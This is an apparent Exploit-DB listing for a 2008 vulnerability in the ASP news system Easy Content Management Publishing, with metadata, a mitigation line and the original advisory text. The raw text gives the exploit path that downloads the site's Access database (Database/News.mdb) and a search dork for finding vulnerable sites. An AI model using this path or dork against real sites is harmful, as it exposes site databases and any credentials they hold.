header-logo
Suggest Exploit
vendor:
Easy Content Management Publishing
by:
BeyazKurt
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Easy Content Management Publishing
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Easy Content Management Publishing

An attacker can access the MS Access database file (News.mdb) by using the directory traversal vulnerability. The vulnerable URL is SITE.COM/Database/News.mdb

Mitigation:

Ensure that the web application is not vulnerable to directory traversal attacks by validating user input and restricting access to sensitive files.
Source

Exploit-DB raw data:

#######################################################
# Author : BeyazKurt
# Contact : BeyazKurt@BSDMail.Com
# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
#
# Script : Easy Content Management Publishing
# Script Site : http://easy-news.org/content-management-terns.asp
# Description :
#  An easy to use ASP-based content management news system. Mulitple login levels, news expiration dates and many more 
# features. Uses MS Access database. Content management systems help increase freshness of your sites content by makeing it 
# easy to update. Free license under the GPL.
# 
# Exploit:
# SITE.COM/Database/News.mdb
# D0rk : "powered by easy-news.org"
#
# -------------------------------
#       Mitrovica është Kosovë, Kosova është Shqiperi - Etnic ALBANIA (H)
#                       Proud 2 Be MUSLIM !
#                      Proud 2 Be ALBANIAN !
# Boyle aciklarida yayinliyosan yuh a.g
#######################################################

# milw0rm.com [2008-12-04]